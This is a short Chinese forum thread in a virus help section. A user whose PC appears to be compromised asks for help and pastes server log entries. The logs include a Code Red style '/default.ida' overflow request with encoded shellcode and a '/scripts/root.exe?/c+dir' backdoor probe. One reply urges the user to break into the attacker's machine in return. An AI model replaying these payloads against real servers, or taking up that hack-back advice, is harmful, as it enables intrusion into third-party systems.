论坛: 病毒专区 标题: 菜鸟紧急求救 复制本贴地址    
作者: afisher [afisher]    论坛用户   登录
各位大侠:我知道我的电脑中了木马,还侵入者进行了交谈,但就是不知中了什么木马,用刚升级的金山毒霸查不到,用木马克星540版也查不到!他进我的电脑比回家还方便,资料全补泄露!

地主 发表时间: 05/24 17:31
回复: lqwangsen [lqwangsen]   论坛用户   登录
那应该是他自己写的木马了。我也不知道有什么好办法。最实用的倒有一个。你重装系统算了。然后装点防火墙软件

B1层 发表时间: 05/24 22:53
回复: afisher [afisher]   论坛用户   登录
在D:\httpd\logs\有个文件accesslog.txt,记录为218.84.185.79 localhost - [04/Apr/2003:16:27:19 +0800] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 868 "" ""
218.76.253.3 localhost - [05/Apr/2003:13:43:19 +0800] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 868 "" ""
218.77.199.133 localhost - [05/Apr/2003:22:10:08 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 868 "" "",后面还有很多一样的内容。
请各位大侠看一下是什么病毒?是红色代码吗?

B2层 发表时间: 05/25 00:05
回复: shavb [shavb]   论坛用户   登录
找到他的地址进行诱惑
他用的可能是小鸡,你也进去玩玩

B3层 发表时间: 06/01 00:14

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号